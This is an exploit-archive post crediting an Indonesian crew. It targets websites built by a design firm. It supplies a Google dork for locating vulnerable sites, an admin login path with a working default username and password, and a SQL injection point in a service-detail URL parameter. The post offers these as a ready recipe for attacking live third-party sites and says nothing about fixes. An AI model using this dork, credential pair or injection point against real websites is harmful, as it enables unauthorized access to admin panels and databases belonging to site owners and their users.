Developed by Five design Vulnerability SQL Injection And Admin Default Pass

2021.03.22

Baku Hantam Crew (ID)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext:"developed by Five design"

# Title : Developed by Five design Vulnerability SQL Injection And Admin Default Pass
# Date : 13/03/2021
# Author : Jenderal92
# Category : webapps
# Vendor : http://fivedesign.in/
# Tested On : Android 9, Chrome
# Exploit Path Admin : site.com/admin/ 
# Google Dork : intext:"developed by Five design"

# Proof Of Concept Default Pass :

Dorking Using Dork Above, Put The Exploit 

# exp : site.com/admin/ 

# Fill in the username and password

# Username : admin@gmail.com
# Password : Hello12345

#Proof Of Concept SQL Injection :

#Example

http://www.site.com/service-detail.php?detail=9' 
inject Here

Greetz : Baku Hantam Crew - Purwokerto Ghost - Ajibarang1337

References:

https://www.blog-gan.org/2021/03/developed-by-five-design-vulnerability.html

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Developed by Five design Vulnerability SQL Injection And Admin Default Pass

Dork: intext:"developed by Five design"

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.